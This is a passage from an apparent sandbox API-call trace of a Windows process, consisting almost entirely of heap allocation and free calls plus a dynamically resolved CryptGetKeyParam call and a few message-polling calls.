hHeap=0x1780000) returned 1 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0099.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0099.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0099.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797088 [0099.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0099.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0099.945] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0099.945] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e2840, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2840*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0099.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0099.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0099.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0099.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0099.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0099.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0099.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0099.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0099.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.999] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.000] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.000] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0100.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0100.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) 